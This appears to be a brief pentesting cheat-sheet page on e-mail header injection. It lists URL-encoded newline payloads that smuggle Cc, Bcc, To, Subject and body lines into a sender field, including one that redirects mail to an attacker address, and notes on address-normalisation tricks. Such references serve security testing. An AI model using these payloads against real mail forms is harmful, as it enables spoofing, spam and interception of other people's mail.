E-mail injection
Email Injections
Inject Cc and Bcc after sender argument
From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.comInject argument
From:sender@domain.com%0ATo:attacker@domain.comInject Subject argument
From:sender@domain.com%0ASubject:This is%20Fake%20SubjectChange the body of the message
From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.Inject in the e-mail name
<john.doe+intigriti@example.com> → <john.doe@example.com>john.doe(intigriti)@example.com → <john.doe@example.com>
IPs
Other vulnerabilities
XSS
Template Injections
SQL injection
SSRF
Parameter pollution
(Email) header injection
Wildcard abuse
Last updated